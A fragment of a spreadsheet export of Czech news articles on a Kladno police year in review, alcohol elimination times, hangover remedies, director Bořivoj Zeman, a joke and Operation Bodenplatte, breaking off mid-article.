Nepoučitelný sběrač elektroodpadu hazardoval se svým životem hned dvakrát, kladenští strážníci ho pokutovali Městská policie Kladno dvakrát během několika hodin přistihla muže ze Stochova , který prohraboval kontejnery na elektroodpad a hazardoval se svým zdravím. 11. 11. 2024 – Automobilové vraky mizí z ulic Kladna , žluté samolepky fungují i jako prevence Město Kladno se rozhodlo řešit problém automobilových vraků a nepojízdných vozidel. Městská policie Kladno se aktivně podílí na odstraňování těchto vozidel. 11. 11. 2024 – Za pomoci žebříku se chtěl vloupat do obchodu v centru Kladna , strážníci ho viděli na kamerách Městská policie Kladno odhalila mladíka, který se pokusil vloupat do obchodu v centru Kladna pomocí žebříku. Byl zadržen díky kamerovému systému. 13. 11. 2024 – Starší ženu postihl epileptický záchvat, pomohli jí kladenští strážníci Kladenští strážníci pomohli starší ženě, která utrpěla epileptický záchvat v Dlouhé ulici poblíž pivovaru. 13. 11. 2024 – Modré majáky služebních vozů městské policie osvítily kladenský vánoční strom na jeho cestě do centra Kladenský vánoční strom byl převezen na náměstí Starosty Pavla s pomocí městské policie, která dohlížela na celou operaci. 15.11.2024 Osiřelé chlapce z Rakovníka při akci Boxeři dětem podpoří i Městská policie Kladno Charitativní akce Boxeři dětem se již v pátek uskuteční v Kulturním centru v Rakovníku. Letošní ročník 14. se koná na podporu pozůstalých synů jejichž matka zahynula při tragické nehodě letos v létě u Lubné . Akci každoročně podporuje i Městská policie Kladno , jejíž strážníci tu nastoupí do ringu v exhibičních zápasech a svou práci předvede také psovod. 18.11.2024 Muž v Kladně boural kudy jezdil, v autosedačce měl dítě a ve voze aktivované airbagy Těžko uvěřitelný případ řešili tento čtvrtek strážníci Městské policie Kladno . V podvečer přistihli u prodejny potravin v ulici Dukelských hrdinů řidiče v nabouraném autě, které mělo aktivované airbagy. Muž jevil známky požití alkoholu a na zadním sedadle vozu byla i malá dívenka v autosedačce 19.11.2024 Boj s přemnoženými divokými prasaty v Kladně pokračuje, městská policie asistovala při odstřelu Strážníci městské policie Kladno o tomto víkendu asistovali myslivcům při odstřelu divokých prasat. Přemnožená černá zvěř se vydává stále častěji do obydlených částí Kladna , a proto město ve spolupráci s mysliveckými spolky podniká různé kroky k jejich regulaci 22.11.2024 je Panik tlačítkem volali řidiči autobusů kladenské strážníky na pomoc hned dvakrát během jediného dne. Dva rychlé zákroky Městské policie Kladno se v pondělí odpoledne odehrály díky stisknutí Panik tlačítka v autobusech městské hromadné dopravy (MHD). V prvním případě strážníci vyjížděli kvůli podezřelému muži, který měl urážet ženu na zastávce a předtím dokonce osahávat dívky v autobuse. Druhý případ nebyl o nic méně závažný. Ve Vodárenské ulici rozezlený muž kopal do autobusu a když byl vpuštěn dovnitř, zničil plexisklo u řidiče 24.11.2024 Městská policie i letos obdarovala Dětské centrum Kladno , peníze pomohou na vybavení nového oddělení. Strážníci Městské policie Kladno spolu s preventisty předali ve čtvrtek v podvečer již tradiční předvánoční finanční dar Dětskému centru Kladno . Městská policie v letošním roce mezi sebou vybrala částku 14 tisíc korun. 28.11.2024 Dobrodinec odevzdal peněženku s téměř 20 tisíci, majitelka se s ní znovu shledala u kladenských strážníků. O malém předvánočním zázraku může hovořit žena z Tuchoměřic , která ve středu ztratila v obchodním centru v Kladně peněženku s téměř 20 tisíci korunami. Díky poctivému nálezci se svou peněženkou i obnosem znovu shledala ve čtvrtek dopoledne, kdy si věci převzala od kladenských strážníků. Říjen 2024: 7. 2. 10. 2024 – Městská policie Kladno zajistila muže s nelegálními drogami Městská policie Kladno při noční kontrole zadržela muže, který měl u sebe nelegální drogy. 8. 10. 10. 2024 – Úspěšná záchrana zraněného cyklisty v parku Kladenští strážníci pomohli cyklistovi, který havaroval v parku. Strážníci mu poskytli první pomoc až do příjezdu záchranné služby. Září 2024: 9. 5. 9. 2024 – Zadržení muže, který kradl v obchodě v Kladně Městská policie Kladno zadržela muže, který byl přistižen při krádeži v obchodě v Kladně . Kradl potraviny a alkohol . 10. 12. 9. 2024 – Pomoc strážníků při požáru ve Stochově Kladenští strážníci pomáhali při požáru v obci Stochov , kde zasahovali společně s hasiči. Srpen 2024: 11. 6. 8. 2024 – Městská policie Kladno pomohla při evakuaci budovy po bombovém poplachu Kladenští strážníci spolupracovali s policií při evakuaci obchodního centra, kde byl nahlášen bombový útok. 12. 20. 8. 2024 – Zabezpečení dopravy při sportovní akci v Kladně Městská policie Kladno dohlížela na bezpečnost a plynulost dopravy během mezinárodní sportovní akce ve městě. Práce s dětmi je jednou z mnoha podstatných činností a aktivit, především v rámci preventivní výchovy. Červenec 2024: 13. 1. 7. 2024 – Dohled nad bezpečností na letních festivalových akcích v Kladně Strážníci Městské policie Kladno zajišťovali bezpečnost návštěvníků letních festivalů a akcí ve městě. Červen 2024: 14. 12. 6. 2024 – Preventivní kontrola nelegálního parkování v Kladně Městská policie Kladno se zaměřila na kontroly parkování ve vysoce frekventovaných oblastech města. Květen 2024: 15. 3. 5. 2024 – Zabránění nelegálnímu rybolovu na přehradě Městská policie Kladno zadržela muže, který se pokusil nelegálně lovit ryby na přehradě v okolí města. Duben 2024: 16. 16. 4. 2024 – Záchrana psa uvězněného v autě během horkého dne Kladenští strážníci pomohli zachránit psa, který byl zamčený v autě během horkého dne. Březen 2024: 17. 25. 3. 2024 – Zajištění dopravy při výbuchu v kladenské průmyslové zóně Městská policie Kladno koordinovala bezpečnostní opatření a dopravu po výbuchu v průmyslové zóně. Únor 2024: 18. 2. 2. 2024 – Pomoc při hledání ztraceného dítěte v Kladně Městská policie Kladno spolupracovala s rodinou a dalšími složkami při hledání ztraceného dítěte ve městě. Po zásluze získávají ocenění Leden 2024: 19. 15. 1. 2024 – Zadržení muže při vloupání do rodinného domu Strážníci Městské policie Kladno zadrželi muže při pokusu o vloupání do rodinného domu v centru Kladna . Rok 2024 byl pro rokem výzev, ale také úspěchů. Bezpečnost Kladna je prioritou a strážníci města Kladno , jsou rádi, že se daří získávat důvěru občanů. MP se věnuje mimo jiné, mnoha preventivním akcím pro děti i dospělé a mimo jiné i pořádání sportovních soutěží, dnes už s mnohaletou tradicí. /spěchy dosahují také na poli sportu, daří se jim špičkově reprezentovat i na ploi soutěží v mnoha odvětvích. Výběr zásahů byl proveden redaktory KL a čistě náhodně jen pro ilustraci práce MP. Nelze zde uvézt naprosto vše. To by vydalo na velmi obsáhlou knihu. Práce této složky města Kladno , zajišťující bezpečí, ochranu majetku i pomoc v oblasti záchrany životů a majetku, je příkladem pro desítky měst v celé republice. Redaktoři a redaktorky Kladenských listů děkují za vstřícnou spolupráci a přejí celé MP Kladno co nejméně problémových zásahů. Především zdraví, přejeme celému týmu, včetně špičkově vycvičených čtyřnohých pomocníků, v roce 2025.</t>
  </si>
  <si>
    <t>20250101_374_3693856999_d30d42474330be926d72.html</t>
  </si>
  <si>
    <t>d30d42474330be926d72</t>
  </si>
  <si>
    <t>Za jak dlouho vyprchá z krve šampus, vodka nebo třeba pivo? Tomu neuvěříte</t>
  </si>
  <si>
    <t>Za jak dlouho vyprchá z krve šampus, vodka nebo třeba pivo ? Tomu neuvěříte alkohol v krvi, kocovina, Silvestr Velká párty k Silvestru neodmyslitelně patří, stejně tak jako alkohol . Ten však může znamenat velké nebezpečí, zvlášť pokud si po alkoholovém dýchánku chcete sednout za volant. Za jak dlouho z vás vyprchá šampus nebo rum? Silvestrovské oslavy jsou tu a s nimi i líbezné alkoholové objetí. Alkohol však v našem těle nadělá více škody než užitku a jeho odbourání nám trvá poměrně dlouho. Pokud na Nový rok potřebujete někam vyjet autem, raději si dejte pozor, abyste nenadýchali, a hlavně nikoho neohrozili. POZOR: Řidiči, kteří před usednutím za volant konzumují alkohol , způsobí ročně zhruba 5000 nehod a usmrtí více než 50 lidí. V tomto článku se proto podíváme na to, za jak dlouho se z těla odplaví alkohol po pití šampusu, rumu, koňaku a piva . A také kdy je bezpečné usednout za volant. Lihoviny se odbourávají nejdelší dobu Zdroj: Shutterstock Jak se tělo pere s alkoholem ? Celková doba, po kterou se bude vaše tělo s alkoholem vypořádávat, záleží nejen na tom, jaký pijete alkohol , ale také na vašem pohlaví, tělesné hmotnosti, metabolismu a tom, zda máte nebo jste při pití měli prázdný nebo plný žaludek. Dalšími faktory jsou například věk nebo váš zdravotní stav. TIP: Každý z nás se s alkoholem popere v jiném časovém intervalu, a proto není vhodné se na 100 % orientovat podle tabulek nebo se spoléhat na zkušeností jiných lidí. Pokud byste podle vzorové tabulky měli být dávno střízliví, ale přesto se necítíte dobře, za volat raději nesedejte. Můžete tak ublížit nejen sobě, ale také ostatním účastníkům silničního provozu. Při kocovině sice už opilí být nemusíte, ale pravděpodobně nebudete ve stavu, kdy jste schopni se naplno věnovat řízení. Za jak dlouho vyprchá? Různé druhy alkoholů se budou z těla dostávat po různou dobu. To je ovlivněno množstvím alkoholu v daném nápoji. Jako první si vezmeme pro příklad muže, který váží 85 kilogramů a ženy, která váží 60 kilogramů. Pro srovnání využijeme například pivo 10. Pokud si dá muž půl litru zlatavého moku, bude jej odbourávat 2 hodiny a 15 minut. V případě piva 12 jsou to 2 hodiny a 45 minut. Naproti tomu žena bude ten samý alkohol odbourávat delší dobu. Pivo 10 bude žena spalovat 3 hodiny a 42 minut a piva 12 se bude její tělo zbavovat 4 hodiny a 31 minut. S každým dalším půllitrem se bude doba odbourávání pochopitelně zvyšovat. Jedná se o razantní rozdíl, se kterým je potřeba počítat. Záleží také na „zkušenostech“ s alkoholem Výsledky se budou u jednotlivých lidí lišit i za předpokladu, že mají stejnou váhu. Roli totiž hrají ještě zkušenosti s alkoholem . Podle webu alkoholium.cz totiž „Zkušenosti s alkoholem (i jiné faktory) mohou vést k rychlejšímu – či naopak pomalejšímu – odbourávání. Nelze na to však spoléhat. Každý máme specifickou geneticky danou i získanou odolnost vůči alkoholu .” Pokud jste v oblasti alkoholu teprve začátečník, bude pro vás pravděpodobně složitější se s alkoholem vypořádat, než pro ostříleného alkoholového mazáka. Alkohol tester odhalí hladinu alkoholu v krvi. Zdroj: Shutterstock A co vína a destiláty? K silvestrovským oslavám samozřejmě neodmyslitelně patří bublinky. Vína , ať už klasická nebo šumivá, zaberou delší dobu pro jejich odbourání než pivo 10. Muž z našeho stanoveného příkladu bude dvojku vína odbourávat 2 hodiny a 28 minut, žena 4 hodiny a 4 minuty. Pokud by sám muž vypil celou láhev vína , jeho tělo by se alkoholu zbavovalo necelých 5 hodin. U žen by tato doba byla mnohem delší. Žena by po vypití lahve vína odbourávala alkohol necelých 8 hodin. Nejdelší dobu pro odbourání zabere pití lihovin. Pro příklad si můžeme stanovit lihovinu o síle 40 %. To může být například rum nebo koňak. Jednoho velkého panáka se bude muž zbavovat 3 hodiny a 15 minut, žena 3 hodiny a 42 minut. Za celý večer na party určitě každý vypije panáků více. Pokud by jich bylo například 5, muž jej bude odbourávat 11 hodin a žena dokonce 18 hodin! Kdy je bezpečné usednout za volant? Nezapomínejte na fakt, že je v Česku nulová tolerance alkoholu za volantem. Proto si dobře rozmyslete, zda vám stojí za to usednout za volant pod vlivem alkoholu . Můžete totiž přijít nejen o papíry, ale v nejhorším případě také o svůj život. Pokud si nejste jisti, zda už můžete za volant, není nic jednoduššího než využít alkohol tester, který spolehlivě odhalí hladinu alkoholu v krvi. Pokud nejste střízliví nebo se necítíte dobře, za volant nikdy nesedejte! Zdroje: besip.gov.cz, policie.gov.cz, alkoholium.cz Autor: Veronika Hudcová Autor person Veronika Hudcová</t>
  </si>
  <si>
    <t>1980</t>
  </si>
  <si>
    <t>20250101_375_986662150_61549b1250208d4d2dec.html</t>
  </si>
  <si>
    <t>61549b1250208d4d2dec</t>
  </si>
  <si>
    <t>7 nejlepších vyprošťováků ze silvestrovské kocoviny</t>
  </si>
  <si>
    <t>7 nejlepších vyprošťováků ze silvestrovské kocoviny Říká se: Jak na Nový rok, tak po celý rok. Kdo by ale chtěl, aby ho celý rok bolela hlava a žaludek se houpal na vodě? Že se tentokrát na silvestrovské oslavě budete krotit, je jen marné předsevzetí. Proč si kazit večer i náladu, když známe zaručené vyprošťováky. Nepodařilo se vám pít s mírou a trápí vás kocovina! Pokud je jen mírná a není vám špatně od žaludku, pomůže sytá tučnější snídaně. Nebo také zabírá, jak se říká: Čím ses zkazil, tím se naprav: tedy sklenička piva či vína (opravdu ale jen jedna). Pokud je však hůř, rozhodně si po proflámované noci nevařte kafe. Už tak máte organizmus dehydrovaný alkoholem a jen byste víc podráždila žaludek. V první řadě vypijte co nejvíce obyčejné vody. A pokud už jen to nepomůže, vsaďte na některou z našich zaručených rad. TIP NA VIDEO: Historie novoročních ohňostrojů a ty nejkrásnějších za poslední roky 1. Horký silný vývar • Nejlepší je klasický vývar hovězí, kuřecí nebo slepičí, ale nemáte-li je, oceníte i vývar zeleninový. Nezapomeňte si ho do zásoby připravit předem! • Pomůže také jen spařený celer nebo kopr. • V největší nouzi by měl zabrat i bujón v kostce či jakákoliv instantní polévka: zeleninová, hovězí, kuřecí, slepičí. Uvařte si ji ale více koncentrovanou, tedy dejte méně vody, než je uvedeno. 2. Zeleninový koktejl Nápoj, který vás probere a povzbudí organizmus: Na kousky nakrájejte oloupanou polovinu salátové okurky, menší červenou papriku, přidejte 2 lžičky kečupu, trochu čerstvé, případně sušené bazalky, 1 dcl rajské šťávy a celerové šťávy. Rozmixujte, pak případně dolejte minerálkou, aby konzistence nebyla příliš hustá. Nakonec opepřete a přidejte pár kostek ledu. A vypijte! 3. Kyselá vzpruha Zavináč, kyselá okurka či podobná pochutina, jak známo, dokáže napravit chuť i žaludek. Pokud však nemáte na jídlo ani pomyšlení, stačí okyselit organizmus tekutinou: • Ocet zřeďte vodou jen do mírné kyselosti, přidejte trochu jedlé sody a rychle vypijte. Můžete v této kombinaci použít i citronovou šťávu či lák z okurek nebo zelí. • Vymačkejte celý citron do půllitrové sklenice a zalijte hodně studenou vodou. Vypijte co nejrychleji. Můžete použít i koncentrovanou citronovou šťávu, tu pak zřeďte v poměru 5 ml na 1 dcl vody. • Měl by ale také zabrat jen samotný lák z kyselých okurek nebo naložené zeleniny, šťáva z kyselého zelí i z utopenců nebo zavináčů. 4. Bylinkový čaj • Pomoct by měl hlavně mátový, který uklidňuje zažívání. Na podporu činnosti jater, které zápasí s alkoholem nejvíc, pomůže řebříčkový čaj. Heřmánek pak přispěje k celkové pohodě organizmu. • Na nevolnost můžete vyzkoušet i čaj z čerstvého zázvoru, který pomáhá mj. i při nachlazení. Na jeden hrnek oloupejte a nastrouhejte asi 1 cm kousek zázvoru, přelijte horkou vodou a nechte 10 minut louhovat. Přislaďte medem a pomalu popíjejte. 5. Běžné léky Acylpyrin a Paralen jsou osvědčené léky na kocovinu. Nejlepší jsou ty šumivé, rozpustné ve vodě. Stačí 2 tablety na 1/2 litru vody a co nejrychleji je vypít. Doplňte také hladinu vitaminů a minerálů. Zabrat by měly třeba tabletky vitaminu B a C anebo také hořčík. V lékarně si můžete koupit speciální preparáty určené přímo na kocovinu. 6. Sprcha vás probere I když máte pocit, že v nejbližších vteřinách umřete, snažte se doplazit alespoň do sprchy. Napřed si dopřejte příjemný teplý proud vody, který postupně nahraďte vlažným až studeným, jak snesete. Dokonale vás to probere. 7. Vyrazte ven! Přestože se vám nechce ani vylézt z postele, donuťte se k novoroční procházce. První okamžiky budou nejspíš krušné, ale pohyb a studený vzduch okysličí vaši krev a mozkové buňky a probere i zbytek narušeného organizmu. Zhluboka dýchejte a uvidíte, že se za pár minut budete cítit podstatně lépe. Videohub Historie novoročních ohňostrojů a ty nejkrásnějších za poslední roky Silvestrovské a novoroční zvyky a tradice. Co (ne)dělat, abyste měli skvělý rok? istock.com profimedia.cz SHUTTERSTOCK.COM scom Co je dobré na kocovinu? Pokud jste to přehnala s alkoholem , snažte se z toho vyspat. Především mentol, který najdete v mátovém oleji, uklidní podrážděná střeva. Dejte si sprchu, ale rozhodně ne ledovou! Skvělé vychytávky na sterilování Silvestr vám dal zase zabrat? Víme, co vám pomůže. Autor: bak Autor person bak Rubrika transition_slide Zdraví</t>
  </si>
  <si>
    <t>686680</t>
  </si>
  <si>
    <t>20250101_376_3693787942_6ccb92441b97c571addc.html</t>
  </si>
  <si>
    <t>6ccb92441b97c571addc</t>
  </si>
  <si>
    <t>Režisér Bořivoj Zeman (†79): Osud jménem KRASOMILA</t>
  </si>
  <si>
    <t>Režisér Bořivoj Zeman (†79): Osud jménem KRASOMILA 1952 Pyšná princezna (foto ara) Natočil 14 filmů, které se vesměs staly velmi populární. Například Dovolená s Andělem (1952), Anděl na horách (1955) či Fantom Morrisvillu (1966). Přesto je Bořivoj Zeman (†79) považován hlavně za zakladatele české filmové pohádky. I když režíroval »jen« čtyři, všechny se o Vánocích pravidelně objevují na televizních obrazovkách. Co se návštěvnosti týká, jeho Pyšná princezna z roku 1952 je dodnes jedním z nejúspěšnějších českých filmů všech dob! Do kin se na milostný příběh princezny Krasomily a krále Miroslava v podání Aleny Vránové (92) a Vladimíra Ráže (†77) přišlo podívat 8 222 695 diváků! Zeman vtělil do filmu vše, co má správná česká pohádka mít – krásnou princeznu, pohledného prince, nádherné exteriéry, zajímavé kostýmy, hezkou písničku, laskavost i humor. Konflikt s Werichem U herců se Bořivoj Zeman těšil velmi dobré pověsti a všichni s ním rádi točili. Jen jednou se dostal do konfliktní situace – s Janem Werichem (†75) během natáčení pohádky Byl jednou jeden král (1954). „Pan Werich byl silná osobnost a i řada jiných režisérů s ním měla v komunikaci jistý problém nalézt tu správnou míru, kdy třeba ustoupit, nebo si stát za svým. Takže to balancování bylo na ostří nože, táta byl z toho docela vystresovaný,“ vzpomínala v rozhovoru pro Radiožurnál jeho dcera Zuzana Zemanová (68), která je rovněž režisérkou. Smrt před Vánoci Bořivoj Zeman byl dvakrát ženatý. První manželka, spisovatelka Alena Santarová (†44) byla dcerou spisovatele Vladislava Vančury (†50). Manželství ale vydrželo jen tři roky. S druhou ženou Jarmilou Pazderovou se setkal na Barrandově , kde pracovala. Měli dvě dcery – kromě Zuzany ještě Ivu. Na sklonku života ho velmi trápilo, že se mu nedostalo žádného oficiálního ocenění. Zemřel v předvečer Štědrého dne roku 1991 ve věku 79 let... Pyšná princezna Krasomila: Milostný život herečky Aleny Vránové přerostl v medializovaný skandál Video se připravuje ... O cihlu vedle... Končím! Mezi jeho největší koníčky patřilo sledování fotbalových zápasů, byl náruživý kuřák, rád si dal pivo a pravidelně si zapisoval, kolik diváků v kinech vidělo jeho filmy. Celkem jich bylo více než 50 milionů! Jeho poslední pohádku a zároveň film Honza málem králem vidělo v kinech více než milion lidí. Sám režisér ale nebyl s výsledkem příliš spokojen. Dceři Zuzaně, která mu dělala asistentku, tehdy řekl: „Holka, není to ono, končím! Je to o cihlu vedle...“ Začínal jako svačinář Bořivoj vystudoval střední obchodní školu a léta pracoval jako řadový úředník. Matematika mu ale moc nešla. Vždy, když počítal dlouhé sloupce čísel, nikdy mu výsledek nevyšel dvakrát stejně, natož správně. Kolegové ho proto posílali pro tzv. »kavárenské směsi«, takže jim dělal v podstatě svačináře. Ve volném čase si psal krátké prózy, pak scénáře. S jedním z nich se v roce 1936 přihlásil do soutěže, kterou vyhrál. Dostal místo scenáristy v hostivařských ateliérech a konečně mohl vykročit na novou životní cestu. Návrat nejoblíbenější české pohádky Pyšná princezna Video se připravuje ... Autor: str Autor person str</t>
  </si>
  <si>
    <t>107720</t>
  </si>
  <si>
    <t>20250101_377_3693787348_ab939dc4f5220b7e36fa.html</t>
  </si>
  <si>
    <t>ab939dc4f5220b7e36fa</t>
  </si>
  <si>
    <t>Sexy vtípek s Věrou!</t>
  </si>
  <si>
    <t>Sexy vtípek s Věrou! Věra (foto ara) Dva ztracení chlápci jsou v horách a přijde k nim bernardýn se soudkem piva na krku. První: „Hele, nejlepší přítel člověka!“ Druhý: „No jo, a nese ho pes!“ Věra • foto ara Zavolej mi na 909 80 20 10 nebo mi rovnou napiš SMS na číslo 909 15 39 s kódem 67HE a tvůj text!</t>
  </si>
  <si>
    <t>20250101_378_3693796184_cf123bf40cb5d07d17cf.html</t>
  </si>
  <si>
    <t>cf123bf40cb5d07d17cf</t>
  </si>
  <si>
    <t>Operace Bodenplatte: Poslední německá letecká ofenziva skončila krachem</t>
  </si>
  <si>
    <t>Operace Bodenplatte: Poslední německá letecká ofenziva skončila krachem Nový rok nezačínal pro německou brannou moc zrovna příznivě. Po neúspěchu Rundstedtovy ofenzivy (spojenecké označení pro bitvu v Ardenách , pozn. red.) nacisté, tísněni ruskými armádami v Polsku i v Československu , byli na všech frontách v defenzivě. Přesto startovaly toho dne asi v 7.45 z více než 20 letišť pokrytých sněhem silné sestavy focke-wulfů 190 a messeschmittů 109… Tato slova napsal o 1. lednu roku 1945 ve své knize Velký cirkus slavný francouzský stíhač Pierre Henri Clostermann. Začínal tím svůj popis poslední velké ofenzivy Luftwaffe neboli takzvané operace Bodenplatte (operace Podlahová deska). Historie Němci chtěli touto akcí zvrátit převahu Spojenců ve vzdušném prostoru, a to tak, že obřím náletem na spojenecké letecké základny zničí většinu britské, americké a francouzské vzdušné síly ještě na zemi. Přestože jejich operace způsobila spojeneckým vojskům značné škody, svůj hlavní cíl – umožnit Němcům znovu opanovat nebe nad západní Evropou – rozhodně nesplnila. Naopak. V konečném důsledku znamenala pro německé letectvo katastrofu. „Na severu okresu Hochtaunus u města Merzhausen, kde se od pozdního podzimu předchozího roku nacházela letecká základna I. skupiny JG 2, byla ještě noc. Piloti všech čtyř perutí opustili své ubikace v Altweilnau a Niederlaukenu a brzy ráno se vydali na svá polní letiště. Po krátké operační instruktáži – sami kapitáni perutí nic konkrétního nevěděli – se rozjeli ke svým letounům. Cítili, že to bude těžký den. Ale operace Bodenplatte měla všechny hrozivé předtuchy ještě překonat,“ uvádí německý letecký historik Philipp Prinzing na stránkách titulu Flug Revue . | Video: Youtube Drsné ráno Faktem ale zůstává, že novoroční německý úder spojenecké letce tvrdě zaskočil. Nebyli na něj vůbec připraveni. „První hodiny roku 1945 jsme trávili vítáním nového roku. Vzájemně jsme si přáli všechno nejlepší a dali si spolu pár piv ,“ vzpomínal na poslední chvíle před útokem zbrojíř 137. perutě RAF Desmond Shepherd. Jeho peruť se v té době nacházela na letecké základně v nizozemském Eindhovenu . Historie „Po snídani jsem přecházel letištní dráhu směrem ke zbrojnici. V té chvíli jsem zaslechl střelbu. Když jsem se podíval nad ranvej, uviděl jsem něco, co vypadalo jako německá proudová stíhačka Messerschmitt Me 262, která se mi prohnala přímo nad hlavou, a těsně za ní následovalo několik focke-wulfů 190. Z opačné strany přilétalo několik messeschmittů 109. Vrhl jsem se do trávy vedle ranveje,“ pokračoval Shepherd ve vzpomínkách, které před pěti lety zachytil novinář a spisovatel Don Hollway na stránkách History Net . close info Zdroj: Wikimedia Commons, Royal Air Force official photographer, volné dílo zoom_in Hořící letoun Douglas Dakota náležející k velitelství dopravy britského Královského letectva (RAF), který byl zničen během útoku na leteckou základnu Melsbroek v Belgii , provedeného stíhacími bombardéry Luftwaffe v rámci operace Bodenplatte Podle pozdějšího Clostermannova svědectví v knize Velký cirkus shromáždil německý polní maršál Luftwaffe Hugo Wilhelm Sperrle k tomuto úderu, jaký neměl za celou válku obdoby, tucet elitních stíhacích perutí. Soustředil je na letištích v Twentu, Apeldoornu , Aldhornu, v Hagelo , Münsteru , Lippstadtě, Rheine, Neukirchenu , Metelen, Harskanfu, v Teuge a na všech satelitních letištích těchto základen. „Později se zjistilo, že šlo o stíhací perutě (Jagdgeschwader) JG-2, JG-3, JG-4, JG-5, JG-26, JG-27, JG-52, JG-53 a několik dalších útvarů – dohromady asi o 650 focke-wulfů 190 D a asi o 450 messerschmittů 109 K,“ vypočítává Clostermann v knize Velký cirkus. Historie Luftwaffe chtěla tímto obřím náletem znovu ovládnout vzdušný prostor nad západní Evropou . Spolu se zničením spojeneckých strojů ještě na zemi měli letci zlikvidovat i sklady, zásoby paliva a infrastrukturu letišť. „Do akce se zapojily všechny stíhací a bombardovací jednotky Luftwaffe na západní frontě spolu s jednotkami nočních stíhaček převelenými k této operaci. Jako vedoucí letadla posloužily stroje Junkers 88,“ uvádí na svých stránkách Memorial Flight Club RAF . Německé letouny se vznesly do vzduchu asi ve tři čtvrtě na osm ráno. Kolem půl deváté už na 27 spojeneckých základnách od Bruselu až po Eindhoven dohořívaly na zemi stovky anglických a amerických letounů, zničených při tomto náletu. Němce však čekala drtivá odveta. Mysleli, že jde o vtip Německé letouny zaútočily podle Clostermanna ve třech sestavách po 300 až 400 strojích, vedených již zmíněnými junkersy. Jedna sestava přeletěla v nízkém letu těsně nad vlnami takzvané Zuiderské moře (dnes již zaniklou mělkou zátoku o rozloze přibližně 5 tisíc km² u nizozemského pobřeží, propojenou přes Waddenzee a Západofríské ostrovy se Severním mořem) a vznesla se až nad Bruselem . Druhý proud letěl v přízemním letu přes Arnhem k Eindhovenu a třetí přes Venlo k americkým liniím. Pro spojence znamenal tento nálet dokonalé překvapení. „Když němečtí stíhači rozbíjeli letištní plochu v belgickém Knokke, zavolal velitel letky G. Dickinson naléhavě na velitelství, ale uslyšel jen: ‚Je 1. ledna, brácho, není apríl,‘“ píše Hollway. Na velitelství si mysleli, že Dickinson žertuje, ještě při hovoru se ale měli přesvědčit, že se hluboce mýlí. Německé letouny se totiž vrhly i na ně. Dickinson ještě uslyšel ve sluchátku nevěřícné vzdychnutí: „Můj Bože, ti parchanti jsou tady!“, načež se hovor přerušil. Když so o chvíli později pokusil zavolat znovu, byla už telefonní linka mimo provoz. Historie „Překvapení bylo naprosté. Téměř půl hodiny postřelovaly messerschmitty a focke-wulfy spojenecké letouny, namačkané na zledovatělých letištích. V soustředěné nepřátelské palbě se podařilo vzlétnout jen několika málo spitfirům,“ píše Clostermann. Podle jeho odhadu se Němcům podařilo v několika minutách zneškodnit až 800 spojeneckých letounů. „Jenom v Bruxelles -Evere bylo zničeno 123 dopravních letadel, létajících pevností, tajfunů a spitfirů. V Eindhovenu byla úplně zničena celá 124. kanadská peruť a jedna polská peruť spitfirů,“ uvádí slavný francouzský stíhač. K tomu je ale třeba dodat, že podle jiných pramenů byl počet skutečně zničených spojeneckých letadel výrazně menší. „Na spojenecké straně bylo zničeno 305 letadel a poškozeno 190, většina z nich na zemi,“ konstatuje Prinzing na stránkách Flug Revue. Spitfiry vracejí úder Za to, že nálet Luftwaffe ani přes jeho překvapivost přece jen nevyšel, vděčí historie nejspíše tomu, že ne všichni spojenečtí piloti měli takovou kocovinu, jak Němci doufali. Z řady základen tak ještě před německým úderem odletěli plnit své ranní úkoly, a když po návratu zjistili, co se děje, mohli se okamžitě zapojit do boje. „Jedenatřicet spitfirů ze tří polských perutí 131. křídla vzlétlo hned ráno 1. ledna mezi čtvrt na devět a půl devátou na bombardovací mise proti několika různým německým cílům. Když tedy na letiště v Sint-Denijs-Westrem zaútočilo v půl desáté 36 focke-wulfů 190 ze skupiny JG 1, tato letadla již nebyla na zemi,“ uvádí Memorial Flight Club RAF . Historie Focke-wulfy se při ničivém útoku zaměřily na zaparkovaná letadla, nákladní auta, budovy a další klíčovou infrastrukturu. Jejich úder zničil 18 spitfirů, jednu létající pevnost B-17, jeden těžký bombardér Short Stirling, čtyři avro ansony, jeden víceúčelový bojový letoun DH Mosquito a jeden auster. Zahynuli tři polští příslušníci pozemního personálu – dva řidiči a jeden letecký mechanik – a dalších 18 bylo zraněno. Ale jakkoli byly tyto ztráty tragické, ve skutečnosti byly vlastně nízké, protože nebýt brzkého startu Poláků, mohlo být zničených letounů i lidských obětí výrazně víc. Navíc ještě v době německého útoku se začali polští piloti ze svého ranního letu vracet. A když viděli, co se na jejich letišti děje, pustili se do Němců se vší vervou a zuřivostí, která byla pro jejich působení v RAF příznačná. close info Zdroj: Wikimedia Commons, Royal Air Force official photographer, volné dílo zoom_in Hasiči stříkají hasicí pěnu na hořící bombardér Avro Lancaster, zasažený zápalnou bombou během německého náletu v rámci operace Bodenplatte „První byl zpátky poručík Waclaw Chojnacki z 308. perutě, který se vrátil předčasně kvůli problémům s mechanismem uvolnění pumy u svého spitfiru. Sestřelil focke-wulf 190, a ten na letišti narazil do B-17 . Bohužel, Chojnacki bojoval proti naprosté přesile a nevyhnutelně byl sestřelen a zabit. Jak se ale vracely ostatní spitfiry, okamžitě se všechny vrhly na focke-wulfy. Přestože se obě strany potýkaly s nedostatkem paliva, strhl se v nízké výšce hromadný letecký souboj, v takovém měřítku jeden z posledních. Polští piloti si nárokovali 14 zničených focke-wulfů 190, zatímco sami ztratili v boji jen dva spitfiry, včetně Chojnackého stroje. Bohužel i pilot druhého sestřeleného spitfiru, poručík Tadeusz Powierza z 317. perutě, při akci zahynul. Další sedm spitfirů muselo nuceně přistát kvůli poškození nebo úplnému vyčerpání paliva. Z 36 focke-wulfů 190, které to ráno vyrazily zaútočit na letiště Sint-Denijs-Westrem, se však 17 už nikdy nevrátilo,“ popisuje dění Memorial Flight Club RAF. Historie Štěstí měla také spojenecká základna Volkel ve městě Uden v Severním Brabantsku , kde bylo umístěno 122. křídlo RAF. Také toto křídlo vzlétlo onoho rána díky šťastné náhodě k ofenzivní operaci (takzvanému sweepu) nad Německem , díky čemuž neutrpělo při bombardování prakticky žádné ztráty a při návratu mohlo naopak ostřelovat Němce. Protiletecká obrana nespala Další těžké rány zasadila německému letectvu bdělá spojenecká protiletecká obrana. „Všechny letky zaznamenaly ztráty. Druhá skupina ztratila svého velitele Schrödera, který musel opustit svůj messerschmitt a na zemi padl do zajetí. Dvě perutě z druhé letky Richthofen byly zdecimovány na polovinu. Šlo o ztrátu, ze které se jedna z dosud nejúspěšnějších a nejprověřenějších německých stíhacích eskader již nikdy nevzpamatovala. Celková ztráta činila 40 procent,“ vypočítává Prinzing. Podle prvotních odhadů po boji ztratila Luftwaffe za několik 